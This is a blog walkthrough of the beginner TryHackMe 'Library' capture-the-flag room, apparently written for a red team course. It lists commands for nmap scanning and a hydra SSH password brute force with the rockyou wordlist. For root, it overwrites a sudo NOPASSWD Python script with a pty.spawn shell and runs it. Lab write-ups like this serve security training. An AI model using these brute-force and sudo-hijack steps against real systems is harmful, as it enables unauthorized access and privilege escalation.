TryHackMe: Library room walkthrough

This is a write up covering steps taken to solve a beginner level security challenge, find user.txt and root.txt flags for Library room in TryHackMe platform.

This blog is written as part of task of Masters Certification in Red Team Program from HackerU.

Step 1 : Connect to TryHackMe and start target machine.

  1. Download OpenVPN configuration setting from TryHackMe platform
  2. Connect to TryHackMe by running the command in kali terminal:

sudo openvpn /pathtoOVPNfile.ovpn

3. Start machine in ‘library’ room — target ip address will be displayed in a minute.

https://tryhackme.com/room/bsidesgtlibrary

Step 2 : Information gathering using Nmap

  1. Start nmap scan of the target ip:

nmap -A -O <target ip>

nmap output

Step 3: Detailed Findings

Open ports:

22 : SSH

80 : http Apache httpd 2.4.18

  1. Navigating to robots.txt got hint as “rockyou”

2. Accessing open ports

port 80 : Username is displayed as author

Port 80

3. Since port 22 is open, try to brute force and find user credentials with above found username and clue from robots.txt

hydra -l meliodas -P /usr/share/wordlists/rockyou.txt 10.10.43.179 ssh

Credentials found

4. Login with above found credentials through SSH, login is successful

ssh meliodas@<targetip>

5. Found user.txt

6. checking for privileges

sudo -l

Found privileges for /home/meliodas/bak.py

7. As bak.py has permission to run with sudo NOPASSWD , so remove bak.py and create a new file.

rm bak.py

echo ‘import pty;pty.spawn(“/bin/sh”)’ > /home/meliodas/bak.py

8. Run bak.py file with sudo permission >user got root access

sudo python /home/meliodas/bak.py

9. Navigate to root folder > found root.txt file

With these steps, I was able to answer questions posted in Library room on TryHackMe.

Thank you for reading this blog..

--

--

--

Software Tester

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Personal Performance Analysis (GMZ Series Part 3)

Free tier is here to stay

Wallboards — a great value for our teams and clients

Ramblings From 1A

CSS Fundamentals: Vendor Prefixing

4 useful command lines utility in Django

AMAZON EKS

Running Distributed Queries in Microservices

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
HinaK

HinaK

Software Tester

More from Medium

ClassLoader in JVM

Chilli Pickle

HackTheBox: Archetype Walkthrough

TryToHackMe — Simple CTF